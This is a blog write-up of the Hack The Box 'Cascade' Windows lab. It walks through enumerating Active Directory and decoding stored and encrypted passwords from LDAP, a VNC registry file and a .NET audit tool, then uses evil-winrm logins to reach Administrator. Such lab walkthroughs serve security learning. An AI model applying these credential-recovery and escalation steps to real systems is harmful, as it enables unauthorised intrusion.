Cascade HTB Writeup

Hello,

This is my write-up for Cascade box, which was a windows box. I had some difficulties with this since I am not that good with windows but I learned new things. Let’s dive into it.

First of all I scan for available ports using the following nmap command.

nmap -sC -sV -oA initial -Pn 10.10.10.182

I get the following result:

PORT      STATE SERVICE       VERSION                                                                                                                                                                                                      
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)                                                                                                                                               
| dns-nsid:                                                                                                                                                                                                                                
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)                                                                                                                                                                                        
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2020-04-01 15:35:14Z)                                                                                                                                               
135/tcp   open  msrpc         Microsoft Windows RPC                                                                                                                                                                                        
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn                                                                                                                                                                                
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)                                                                                                               
445/tcp   open  microsoft-ds?                                                                                                                                                                                                              
636/tcp   open  tcpwrapped                                                                                                                                                                                                                 
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)                                                                                                               
3269/tcp  open  tcpwrapped                                                                                                                                                                                                                 
49154/tcp open  msrpc         Microsoft Windows RPC                                                                  
49155/tcp open  msrpc         Microsoft Windows RPC                                                                  
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0                                                    
49158/tcp open  msrpc         Microsoft Windows RPC                                                                  
Service Info: Host: CASC-DC1; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows                                                                                                                      
                                                                                                                     
Host script results:                                                                                                                                                                                                                       
|_clock-skew: -1s                                                                                                    
| smb2-security-mode:                                                                                                
|   2.02:                                                                                                            
|_    Message signing enabled and required                                                                           
| smb2-time:                                                                                                         
|   date: 2020-04-01T15:36:03                                                                                        
|_  start_date: 2020-04-01T14:37:26                                                                                  

We have few services which are relatable to active directory such as kerberos, ldap, smb.
First I will use enum4linux to get possible username and group, which information accessible from ldap.

enum4linux -a 10.10.10.182

Users:
Group 'Domain Users' (RID: 513) has member: CASCADE\administrator
Group 'Domain Users' (RID: 513) has member: CASCADE\krbtgt
Group 'Domain Users' (RID: 513) has member: CASCADE\arksvc 
Group 'Domain Users' (RID: 513) has member: CASCADE\s.smith
Group 'Domain Users' (RID: 513) has member: CASCADE\r.thompson
Group 'Domain Users' (RID: 513) has member: CASCADE\util
Group 'Domain Users' (RID: 513) has member: CASCADE\j.wakefield
Group 'Domain Users' (RID: 513) has member: CASCADE\s.hickson
Group 'Domain Users' (RID: 513) has member: CASCADE\j.goodhand
Group 'Domain Users' (RID: 513) has member: CASCADE\a.turnbull
Group 'Domain Users' (RID: 513) has member: CASCADE\e.crowe
Group 'Domain Users' (RID: 513) has member: CASCADE\b.hanson
Group 'Domain Users' (RID: 513) has member: CASCADE\d.burman
Group 'Domain Users' (RID: 513) has member: CASCADE\BackupSvc
Group 'Domain Users' (RID: 513) has member: CASCADE\j.allen
Group 'Domain Users' (RID: 513) has member: CASCADE\i.croft

Groups:
group:[Cert Publishers] rid:[0x205]                                                                                  
group:[RAS and IAS Servers] rid:[0x229]                                                                              
group:[Allowed RODC Password Replication Group] rid:[0x23b]                                                          
group:[Denied RODC Password Replication Group] rid:[0x23c]                                                           
group:[DnsAdmins] rid:[0x44e]                                                                                        
group:[IT] rid:[0x459]                                                                                               
group:[Production] rid:[0x45a]                                                                                       
group:[HR] rid:[0x45b]                                                                                               
group:[AD Recycle Bin] rid:[0x45f]                                                                                   
group:[Backup] rid:[0x460]                                                                                           
group:[Temps] rid:[0x463]                                                                                            
group:[WinRMRemoteWMIUsers__] rid:[0x465]                                                                            
group:[Remote Management Users] rid:[0x466]                                                                          
group:[Factory] rid:[0x46c]                                                                                          
group:[Finance] rid:[0x46d]                                                                                          
group:[Audit Share] rid:[0x471]                                                                                      
group:[Data Share] rid:[0x472]  

I have a list of usernames and a list of groups. I will try with each one of these username to do a null authentication on smb port 445. But that was not the case. At this point I install and open a gui tool called jxplorer. With this tool I can inspect ldap easily. I enter the host ip and then try to find juicy info on users attributes.
r_thompson_password_base64

User r.thompson has a attribute named CascadeLegacyPwd, and I can tell it is base64 because I see a =.
I get the password for that user.

echo -n "clk0bjVldmE=" | base64 -d
rY4n5eva

Let’s use smbclient with the username and password we have, to test if we can login to smb …..

smbclient -L //10.10.10.182 -U r.thompson
Enter WORKGROUP\r.thompson's password: rY4n5eva

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        Audit$          Disk      
        C$              Disk      Default share
        Data            Disk      
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        print$          Disk      Printer Drivers
        SYSVOL          Disk      Logon server share 
SMB1 disabled -- no workgroup available

I try to access Audit$ but I don’t have permission to do, and then I try Data:

kali@kali:~/Desktop/Boxes/Cascade/Nmap$ smbclient  //10.10.10.182/Audit$ -U r.thompson
Enter WORKGROUP\r.thompson's password: 
Try "help" to get a list of possible commands.
smb: \> ls
NT_STATUS_ACCESS_DENIED listing \*
smb: \> exit
kali@kali:~/Desktop/Boxes/Cascade/Nmap$ smbclient  //10.10.10.182/Data -U r.thompson
Enter WORKGROUP\r.thompson's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sun Jan 26 22:27:34 2020
  ..                                  D        0  Sun Jan 26 22:27:34 2020
  Contractors                         D        0  Sun Jan 12 20:45:11 2020
  Finance                             D        0  Sun Jan 12 20:45:06 2020
  IT                                  D        0  Tue Jan 28 13:04:51 2020
  Production                          D        0  Sun Jan 12 20:45:18 2020
  Temps                               D        0  Sun Jan 12 20:45:15 2020

                13106687 blocks of size 4096. 7797938 blocks available
smb: \> 

I was able to get these files from the share.

kali@kali:~/Desktop/Boxes/Cascade/smbshare/Data$ ls
 ArkAdRecycleBin.log   dcdiag.log   Meeting_Notes_June_2018.html  'VNC Install.reg'
kali@kali:~/Desktop/Boxes/Cascade/smbshare/Data$ 

The file ArkAdRecycleBin.log contains logs from a program called Ark Ad recycle bin.
ark
If you look closely you can see 2 objects get deleted. And the command is running as user ArkSvc. Maybe we can restore these objects?

The file dcdiag.log has inside:
dcdiag

Which as the header says is something related to Server diagnosis. But there was nothing I could take as good info from this file.

The other file Meeting_Notes_June_2018.html:
meeting_notes

From this file I get the following info:

  • A new server is going live on Wednesday.
  • They will be using a temporary account, which will be deleted at the end of the 2018. Username is TempAdmin and the password is the same as the normal admin.

If you look at the ArkAdRecycleBin file we can see user TempAdmin get deleted and the date is 8/12/2018 which is the day after wednesday. We keep this in our mind.

The last file we see it VNC Install.reg:

vnc_log
This is extracted from a registry as the file extension says. Also there is Password which is in hex. I try and search more in depth for this and find out a tool which may decode the password for me. I used this tool vncpasswd.

kali@kali:~/Desktop/Boxes/Cascade/smbshare/Data$ git clone https://github.com/trinitronx/vncpasswd.py.git vncpasswd.py
Cloning into 'vncpasswd.py'...
remote: Enumerating objects: 26, done.
remote: Counting objects: 100% (26/26), done.
remote: Compressing objects: 100% (22/22), done.
remote: Total 287 (delta 10), reused 13 (delta 4), pack-reused 261
Receiving objects: 100% (287/287), 87.94 KiB | 526.00 KiB/s, done.
Resolving deltas: 100% (144/144), done.
kali@kali:~/Desktop/Boxes/Cascade/smbshare/Data$ cd vncpasswd.py
kali@kali:~/Desktop/Boxes/Cascade/smbshare/Data/vncpasswd.py$ ./vncpasswd.py -d -H "6bcf2a4b6e5aca0f"
Cannot read from Windows Registry on a Linux system
Cannot write to Windows Registry on a Linux system
Decrypted Bin Pass= 'sT333ve2'
Decrypted Hex Pass= '7354333333766532'
kali@kali:~/Desktop/Boxes/Cascade/smbshare/Data/vncpasswd.py$ 

And get the password sT333ve2 . At this point I nmap again to check if winrm is open.

kali@kali:~$ nmap -Pn -p 5985,5986 10.10.10.182
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-08 19:27 EDT
Nmap scan report for 10.10.10.182
Host is up (0.069s latency).

PORT     STATE    SERVICE
5985/tcp open     wsman
5986/tcp filtered wsmans

Nmap done: 1 IP address (1 host up) scanned in 1.77 seconds
kali@kali:~$ 

I first try with user s.smith(name taken from enum4linux output) as this user was also seen in the Meeting_Notes_June_2018.html file.

kali@kali:~$ evil-winrm -i 10.10.10.182 -u s.smith -p sT333ve2
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\s.smith\Documents> whoami
cascade\s.smith

I am logged in as s.smith now and I can read the user.txt file also.
After poking around the box I can’t seem to find much. So I go back, and try to see if I can access the smb share with the credentials of the new user…

smbclient  //10.10.10.182/Audit$ -U s.smith
Enter WORKGROUP\s.smith's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed Jan 29 13:01:26 2020
  ..                                  D        0  Wed Jan 29 13:01:26 2020
  CascAudit.exe                       A    13312  Tue Jan 28 16:46:51 2020
  CascCrypto.dll                      A    12288  Wed Jan 29 13:00:20 2020
  DB                                  D        0  Tue Jan 28 16:40:59 2020
  RunAudit.bat                        A       45  Tue Jan 28 18:29:47 2020
  System.Data.SQLite.dll              A   363520  Sun Oct 27 02:38:36 2019
  System.Data.SQLite.EF6.dll          A   186880  Sun Oct 27 02:38:38 2019
  x64                                 D        0  Sun Jan 26 17:25:27 2020
  x86                                 D        0  Sun Jan 26 17:25:27 2020

                13106687 blocks of size 4096. 7796325 blocks available
smb: \> 

I can access audit which contains a .exe with a dll which seems to be linked to it A DB folder and some others .ddl files.
Inside DB there is a file named Audit.db.

kali@kali:~/Desktop/Boxes/Cascade/smbshare/$ file Audit.db 
Audit.db: SQLite 3.x database, last written using SQLite version  

I open the file with SQlite database browser. I find inside the Ldap Table a base64 string. I try to decode it bu nothing. This seems to belong to a user named ArkSvc. This user maybe is related to ArkAdRecycleBin as seen on the log.
arksvc

By looking into the RunAudit.bat I see there is something related to the executable file.

kali@kali:~/Desktop/Boxes/Cascade/smbshare/$ cat RunAudit.bat 
CascAudit.exe "\\CASC-DC1\Audit$\DB\Audit.db"

Maybe the password is encrypted by using the exe file we saw earlier. I am going to use AvaloniaILSpy you can also use dotPeek if you feel like switching to a windows box.
I open the executable file and try to find the main function. Because this is the function every program starts. In the main program I find some juicy staff.
ILSPY
There is some decryption proccess happening on password = Crypto.DecryptString(encryptedString, "c4scadek3y654321");
I also found a string there. Now I am going to load the dll file to see if I found something there also, as the Crypto.DecryptString may be reffering to the dll. I find the decryption Function inside the dll
decryption_function
There is also a IV key and the decryption algorithm which seems to be AES in CBC mode.

I now have the following extracted:

  • Encrypted password: BQO5l5Kj9MdErXx6Q6AGOw==
  • IV : 1tdyjCbY1Ix49842
  • Key: c4scadek3y654321

By using this website, I get the decrypted password in base64 encoding.

kali@kali:~$ echo -n "dzNsYzBtZUZyMzFuZA==" | base64 -d
w3lc0meFr31nd

I now login as the user ArkSvc and password w3lc0meFr31nd with evil-winrm. Now as the file ArkAdRecycleBin.log shows I will try to restore the deleted accounts, because these are on recyclebin right???…

I see the deleted objects:

get-adobject -filter 'objectclass -eq "user" -AND IsDeleted -eq $True' -IncludeDeletedObjects -properties IsDeleted,LastKnownParent | Format-List Name,IsDeleted,LastKnownParent,DistinguishedName

deleted_object
But trying to restore it does not gives me the rights to do it.

*Evil-WinRM* PS C:\Users\arksvc\Documents> Get-ADObject -Filter {SamAccountName -eq 'TempAdmin'} -IncludeDeletedObjects | Restore-ADObject
Insufficient access rights to perform the operation
At line:1 char:80
+ ... ccountName -eq 'TempAdmin'} -IncludeDeletedObjects | Restore-ADObject
+                                                          ~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (CN=TempAdmin\0A...ascade,DC=local:ADObject) [Restore-ADObject], ADException
    + FullyQualifiedErrorId : 0,Microsoft.ActiveDirectory.Management.Commands.RestoreADObject
*Evil-WinRM* PS C:\Users\arksvc\Documents> 

After a little bit, I try and see if I can see the properties of this object, which may throw us the password as the r.thompson user did.

*Evil-WinRM* PS C:\Users\arksvc\Documents> Get-ADObject -Filter {SamAccountName -eq 'TempAdmin'} -IncludeDeletedObjects -Properties *


accountExpires                  : 9223372036854775807
badPasswordTime                 : 0
badPwdCount                     : 0
CanonicalName                   : cascade.local/Deleted Objects/TempAdmin
                                  DEL:f0cc344d-31e0-4866-bceb-a842791ca059
cascadeLegacyPwd                : YmFDVDNyMWFOMDBkbGVz
CN                              : TempAdmin
                                  DEL:f0cc344d-31e0-4866-bceb-a842791ca059
codePage                        : 0
countryCode                     : 0
Created                         : 1/27/2020 3:23:08 AM
createTimeStamp                 : 1/27/2020 3:23:08 AM
Deleted                         : True
Description                     :
DisplayName                     : TempAdmin
DistinguishedName               : CN=TempAdmin\0ADEL:f0cc344d-31e0-4866-bceb-a842791ca059,CN=Deleted Objects,DC=cascade,DC=local
dSCorePropagationData           : {1/27/2020 3:23:08 AM, 1/1/1601 12:00:00 AM}
givenName                       : TempAdmin
instanceType                    : 4
isDeleted                       : True
LastKnownParent                 : OU=Users,OU=UK,DC=cascade,DC=local
lastLogoff                      : 0
lastLogon                       : 0
logonCount                      : 0
Modified                        : 1/27/2020 3:24:34 AM
modifyTimeStamp                 : 1/27/2020 3:24:34 AM
msDS-LastKnownRDN               : TempAdmin
Name                            : TempAdmin
                                  DEL:f0cc344d-31e0-4866-bceb-a842791ca059
nTSecurityDescriptor            : System.DirectoryServices.ActiveDirectorySecurity
ObjectCategory                  :
ObjectClass                     : user
ObjectGUID                      : f0cc344d-31e0-4866-bceb-a842791ca059
objectSid                       : S-1-5-21-3332504370-1206983947-1165150453-1136
primaryGroupID                  : 513
ProtectedFromAccidentalDeletion : False
pwdLastSet                      : 132245689883479503
sAMAccountName                  : TempAdmin
sDRightsEffective               : 0
userAccountControl              : 66048
userPrincipalName               : TempAdmin@cascade.local
uSNChanged                      : 237705
uSNCreated                      : 237695
whenChanged                     : 1/27/2020 3:24:34 AM
whenCreated                     : 1/27/2020 3:23:08 AM

Indeed it did throw us the password:

cascadeLegacyPwd                : YmFDVDNyMWFOMDBkbGVz
which when I base64 decode it gives me the cleartext password:
baCT3r1aN00dles

I now use again evil-winrm but this time as user Administrator(Because as seen in the file Meeting_Notes_June_2018.html the TempAdmin has the same password as the admin).

kali@kali:~/Desktop/Boxes/Cascade/smbshare/Data/vncpasswd.py$ evil-winrm -i 10.10.10.182 -u Administrator -p baCT3r1aN00dles
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> 

I can obtain root.txt now.

Extra

Trying to log in as TempAdmin does not do something as this users is deleted.
I restore the object with the command Get-ADObject -Filter {SamAccountName -eq 'TempAdmin'} -IncludeDeletedObjects | Restore-ADObject as user administrator and then try to login but I can’t do it. By viewing the in which Groups TempAdmin the user is not inside Remote Management user. By adding the user at that group I can login also as TempAdmin

kali@kali:~/Desktop/Boxes/Cascade/smbshare/Data/vncpasswd.py$ evil-winrm -i 10.10.10.182 -u Administrator -p baCT3r1aN00dles

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> net user TempAdmin
User name                    TempAdmin
Full Name                    TempAdmin
Comment
User's comment
Country code                 000 (System Default)
Account active               Yes
Account expires              Never

Password last set            27/01/2020 04:23:08
Password expires             Never
Password changeable          27/01/2020 04:23:08
Password required            Yes
User may change password     No

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   Never

Logon hours allowed          All

Local Group Memberships      *Remote Management Use
Global Group memberships     *Domain Users
The command completed successfully.

*Evil-WinRM* PS C:\Users\Administrator\Documents> Add-LocalGroupMember -Group "Remote Management Users" -Member "TempAdmin"
*Evil-WinRM* PS C:\Users\Administrator\Documents> exit
kali@kali:~/Desktop/Boxes/Cascade/smbshare/Data/vncpasswd.py$ evil-winrm -i 10.10.10.182 -u TempAdmin -p baCT3r1aN00dles
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\TempAdmin\Documents> whoami
cascade\tempadmin

Here are some useful links while doing this box.
Active-directory-recycle-bin


Cascade HTB Writeup
http://3rg1s.com/2020/07/25/2020-07-25-Cascade/
Posted on
July 25, 2020
Licensed under